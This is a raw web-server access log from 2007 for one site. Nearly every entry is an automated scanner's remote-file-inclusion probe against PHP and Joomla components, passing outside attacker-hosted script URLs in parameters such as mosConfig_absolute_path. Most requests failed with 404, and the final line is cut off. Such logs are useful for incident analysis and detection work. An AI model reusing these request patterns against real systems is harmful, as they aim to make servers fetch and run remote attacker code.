87.106.128.100 - - [29/Oct/2007:14:53:34 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:14:53:35 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:53:35 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:53:39 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
12.22.179.203 - - [29/Oct/2007:14:54:07 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dienachtschwaermer.net/test/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53"
202.157.188.77 - - [29/Oct/2007:14:54:09 -0700] "GET /logs/access_070723.log/index.php?go=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.212.144 - - [29/Oct/2007:14:54:15 -0700] "GET /?N=A HTTP/1.0" 200 1032 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
209.50.235.227 - - [29/Oct/2007:14:54:38 -0700] "GET /logs//index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.50.235.227 - - [29/Oct/2007:14:54:39 -0700] "GET //index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:54:50 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:54:51 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:55:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:14:55:04 -0700] "GET /logs/access_070820.log//index.php?page=&lang=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:14:55:04 -0700] "GET //index.php?page=&lang=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:14:55:05 -0700] "GET /logs//index.php?page=&lang=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:14:55:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:14:56:03 -0700] "GET /logs//index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.117.130 - - [29/Oct/2007:14:56:03 -0700] "GET //index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
12.22.179.203 - - [29/Oct/2007:14:56:04 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://dienachtschwaermer.net/test/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
200.195.11.193 - - [29/Oct/2007:14:56:56 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [29/Oct/2007:14:56:57 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:57:10 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:57:10 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:14:57:55 -0700] "GET /logs/access_070806.log//index.php?page=&lang=http://www.dunakom.hu/userimages/id.txt??